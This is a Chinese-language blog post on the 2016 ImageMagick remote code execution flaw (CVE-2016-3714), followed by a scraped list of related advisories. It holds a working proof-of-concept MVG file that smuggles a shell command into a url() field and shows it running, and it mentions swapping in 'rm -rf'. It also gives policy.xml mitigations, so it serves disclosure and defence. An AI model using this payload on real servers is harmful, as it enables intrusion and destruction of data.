ImageMagick重大0day漏洞-远程代码执行

多的网站和漏洞都在使用ImageMagick处理图片,最近ImageMagick被爆出重大漏洞。
这个漏洞是由于当在转换图片format的时候,由于image decoder缺少了对文件名的过滤引起的远程代码执行。
重现如下:

vim crack.jpg 添加如下内容:

push graphic-context
 
viewbox 0 0 640 480
 
fill 'url(https://example.com/image.jpg"|ls "-la)'
 
pop graphic-context

然后转换格式
mckee@mckee-pc ~/download $ convert crack.jpg out.png          
总用量 570092
drwxr-xr-x 11 mckee mckee      4096  5月 10 16:30 .
drwxr-xr-x 66 mckee mckee      4096  5月 10 16:30 ..
-rw-r-----  1 mckee mckee   1351701  5月  4 10:59 1442042040_271217.zip
-rw-r-----  1 mckee mckee     20694  5月  5 14:59 1462354457_404523.gif
-rw-r-----  1 mckee mckee   2694477  5月  5 17:49 1462414101_624315.zip
......

如果你将ls -l替换其它恶意命令如rm -rf,后果可行而知。

解决办法如下:

(1)在将图片提交给ImageMagick处理之前,先通过"magic bytes"判断文件类型
(2)给ImageMagick添加policy,禁止编码EPHEMERAL, URL, MVG, and MSL.
sudo vim /etc/ImageMagick/policy.xml
<policymap>
  <policy domain="coder" rights="none" pattern="EPHEMERAL" />
  <policy domain="coder" rights="none" pattern="URL" />
  <policy domain="coder" rights="none" pattern="HTTPS" />
  <policy domain="coder" rights="none" pattern="MVG" />
  <policy domain="coder" rights="none" pattern="MSL" />
  <policy domain="coder" rights="none" pattern="TEXT" />
  <policy domain="coder" rights="none" pattern="SHOW" />
  <policy domain="coder" rights="none" pattern="WIN" />
  <policy domain="coder" rights="none" pattern="PLT" />
</policymap>

时间: 2024-08-02 14:09:57

ImageMagick重大0day漏洞-远程代码执行的相关文章

安全预警:ImageMagick 图象处理软件存在远程代码执行(CVE-2016-3714)

ImageMagick是一款广泛流行的图像处理软件,有无数的网站使用它来进行图像处理,但在本周二,ImageMagick披露出了一个严重的 0day漏洞,此漏洞允许攻击者通过上传恶意构造的图像文件,在目标服务器执行任意代码.Slack安全工程师Ryan Hube发现了这一0day漏洞. 如果你在网站中使用了ImageMagick去识别,裁剪或者调整用户上传的图像,你必须确认已经使用了这些缓解措施,并且调整你的代码只接受有效的图像文件,沙盒ImageMagick也是一个不错的主意. 在这个安全漏洞

ImageMagick远程代码执行漏洞CVE-2016-8707 绿盟科技发布安全威胁通告

在 ImageMagicks 的转换实用程序中, TIFF 图像压缩处理存在一个写边界的问题.攻击者利用一个精心编制的 TIFF 文件,可以导致的界限写,特别是可以利用的情况下进入远程执行代码.任何用户都可以利用特殊构造的TIFF触发这个漏洞. 针对这个漏洞,绿盟科技发布了安全威胁通告,全文见文末 ImageMagick远程代码执行漏洞CVE-2016-8707 此漏洞目前是与 ImageMagick转换实用程序捆绑在一起,它是一块非常受欢迎的软件.因此许多使用这个程序进行图像格式转换的 web

IIS 6.0 WebDAV远程代码执行0day漏洞 CVE-2017-7269 PoC已经公开了 但Windows 2003已经没有更新服务了

3月27日,在Windows 2003 R2上使用IIS 6.0 爆出了0Day漏洞(CVE-2017-7269,CNNVD-201703-1151),PoC开始流传,但糟糕的是这产品已经停止更新了,建议大家要么关闭IIS 下的WebDAV服务,要么升级到Windows 2016.绿盟科技发布威胁预警通告,全文如下. Update: 绿盟科技已经发布了该漏洞的分析及防护方案 Microsoft Windows Server 2003 R2 IIS 6.0远程代码执行威胁预警通告 3月27日,Zh

研华Advantech WebAccess爆出10个0Day漏洞 都属于远程代码执行漏洞

在CVSS评分都为7.5,据公开信息显示,厂商和美国ICS-CERT都已经收到并确认这些信息. ZDI-17-567: (0Day) Advantech WebAccess nvA1Media Connect MediaUsername Stack-based Buffer Overflow 远程代码执行漏洞 http://www.zerodayinitiative.com/advisories/ZDI-17-567/ 缓解措施: The killbit can be set on this c

Linux下ImageMagick远程代码执行漏洞修复

漏洞描述:   ImageMagick是一款广泛流行的图像处理软件.近日,该软件被爆出存在远程代码执行漏洞,编号为CVE-2016–3714.此漏洞允许攻击者通过上传恶意构造的图像文件,在目标服务器执行任意代码.由于ImageMagick应用十分广泛,目前已确定Wordpress等知名应用受此漏洞影响.   影响范围:   ImageMagick <= 6.9.3-9   漏洞修复:     安装最新版本的软件   一.下载软件包:   cd /usr/local/src #进入软件包存放目录

绿盟科技网络安全威胁周报2017.18 ​WordPress 远程代码执行/非授权重置密码漏洞CVE-2017-8295

绿盟科技发布了本周安全通告,周报编号NSFOCUS-17-18,绿盟科技漏洞库本周新增36条,其中高危5条.本次周报建议大家关注 WordPress 远程代码执行/非授权重置密码漏洞 . CVE-2016-10033是之前phpmailer在不同场景下的新利用,漏洞可使未经身份验证的远程攻击者在Web服务器用户上下文中执行任意代码,远程控制目标web应用.CVE-2017-8295存在于WordPress 4.7.4之前版本,远程攻击者通过构造密码重置请求,并伪造Host HTTP标识头,可以获

mysql远程代码执行/权限提升漏洞

就我目前测试的情况来看,这个漏洞比较鸡肋,原因有以下两点: 1,使用默认方式安装的mysql,mysql用户并没有配置文件/etc/mysql/my.cnf的所属权限: 2,不关闭selinux或apparmor的话,exp脚本执行是会报错的. legalhackers原文中提到这个漏洞的前提是很多人按照错误的安装指南来进行权限配置,将配置文件的所属用户修改成了mysql.不过貌似漏洞发现者手里还藏了几个更加严重的mysql漏洞,并没有披露. I. VULNERABILITY MySQL <=

绿盟科技网络安全威胁周报2017.12 关注fastjson远程代码执行漏洞 漏洞细节以及利用工具已经曝光

绿盟科技发布了本周安全通告,周报编号NSFOCUS-17-12,绿盟科技漏洞库本周新增44条,其中高危12条.本次周报建议大家关注 fastjson远程代码执行 .目前漏洞细节已经披露,可导致大规模对此漏洞的利用.强烈建议用户检查自己使用的fastjson是否为受影响的版本,如果是,请尽快升级. 焦点漏洞 fastjson远程代码执行 NSFOCUS ID 无 CVE ID 无 受影响版本 1.2.24及之前版本 漏洞点评 fastjson在反序列化时存在安全漏洞,攻击者可以通过提交一个精心构造

Adobe Flash Player多个远程代码执行漏洞 绿盟科技发布安全威胁通告

2016年11月8日(当地时间),Adobe官方网站发布了一个关于Adobe Flash Player产品的安全通告.通告中公布了9个漏洞,涉及到的平台包括Windows,Macintosh,Linux以及Chrome OS.利用这些漏洞时需要被攻击目标访问一个恶意页面或打开一个恶意文件.成功利用这些漏洞后,均可以导致远程代码执行.这9个漏洞的编号如下: CVE-2016-7857 CVE-2016-7858 CVE-2016-7859 CVE-2016-7860 CVE-2016-7861 C